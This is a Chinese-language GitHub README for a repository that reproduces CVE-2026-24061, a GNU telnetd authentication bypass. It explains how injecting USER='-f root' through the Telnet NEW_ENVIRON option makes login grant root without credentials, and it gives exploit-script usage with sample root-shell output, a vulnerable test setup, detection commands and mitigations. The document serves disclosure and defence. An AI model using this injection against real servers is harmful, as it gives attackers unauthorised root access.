anacarsi/CVEs-exploit-2026
GitHub: anacarsi/CVEs-exploit-2026
CVE-2026-24061 GNU Telnetd 身份验证绕过漏洞的完整复现工具,包含利用脚本、测试环境和检测方法。
Stars: 0 | Forks: 0
# CVE-2026-24061:GNU Telnetd 身份验证绕过
## 概述
CVE-2026-24061 是 GNU telnetd 中的一个严重身份验证绕过漏洞,允许远程攻击者在无需凭据的情况下获取 root 权限。
- CVSS 评分:9.8(严重)
- 受影响版本:GNU telnetd 2.7-2 及更早版本
- 发现者:Kyu Neushwaistein (Carlos Cortes Alvarez) - 2026 年 1 月
- 影响:在无需身份验证的情况下以 root 权限远程执行代码
## 漏洞详情
该漏洞于 2015 年引入,原因是在 login 调用字符串中添加了 `%U` 占位符。该占位符会被 USER 环境变量替换,而攻击者可以通过 Telnet NEW-ENVIRON 选项控制该变量。通过将 USER 设置为 "-f root",攻击者可以将 `-f` 标志注入到 `/usr/bin/login` 中,从而完全跳过身份验证。
## 根本原因
漏洞代码路径:
1. telnetd.c 定义:`LOGIN_INVOCATION "%U%p"`
2. %U 扩展为 `getenv("USER")`
3. 攻击者通过 Telnet NEW_ENVIRON 选项控制 USER
4. 服务器执行:`/usr/bin/login -f root`
5. `-f` 标志跳过身份验证,授予 root 访问权限
## 攻击流程
```
Client connects → Server requests NEW_ENVIRON →
Client sends USER="-f root" → Server runs /usr/bin/login -f root →
Root shell granted
```
## 运行漏洞利用
基本用法:
```
python3 main.py
python3 main.py -p 2323 # custom port
```
示例:
```
python3 main.py 192.168.1.100
# [*] 已连接到 192.168.1.100:23
# root@vulnerable:~# whoami
# root
```
## 设置测试环境
方法 1 - Docker(推荐):
```
cd docker-setup
docker build -t vulnerable-telnetd .
docker run -d -p 2323:23 vulnerable-telnetd
```
方法 2 - 安装受影响的软件包:
```
sudo apt-get install inetutils-telnetd=2:2.0-1ubuntu1
echo "telnet stream tcp nowait root /usr/sbin/telnetd telnetd" | sudo tee -a /etc/inetd.conf
sudo service inetd restart
```
## 检测
网络监控:
```
tcpdump -i any -n 'tcp port 23' -A | grep -i "NEW_ENVIRON"
```
日志分析:
```
grep "/usr/bin/login -f" /var/log/auth.log
grep "session opened for user root" /var/log/auth.log
```
## 缓解措施
立即采取的行动:
1. 更新 GNU telnetd:
```
sudo apt-get update && sudo apt-get install inetutils-telnetd
```
2. 禁用 Telnet:
```
sudo systemctl stop telnetd
sudo systemctl disable telnetd
```
3. 替换为 SSH:
```
sudo apt-get install openssh-server
```
长期措施:消除 Telnet 的使用,迁移到 SSH,实施网络分段,并阻断 23 端口。
## 法律免责声明
本材料仅用于教育和授权安全测试。请仅对您拥有或获得明确书面许可测试的系统进行测试。未经授权的访问是非法行为。
## 参考资料
- CVE 条目:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24061
- Telnet 协议 (RFC 854):https://tools.ietf.org/html/rfc854
- Telnet 环境选项 (RFC 1572):https://tools.ietf.org/html/rfc1572
- SafeBreach Labs 分析
最后更新:2026-03-06
标签:BurpSuite集成, CVE-2026-24061, CVSS 9.8, Docker安全环境, GNU Telnetd, PE 加载器, PoC, RCE, Root权限, Telnet, 协议漏洞, 参数注入, 提权, 攻击流, 暴力破解, 漏洞复现, 环境变量注入, 编程工具, 网络安全, 请求拦截, 身份验证绕过, 远程代码执行, 逆向工具, 隐私保护, 零日漏洞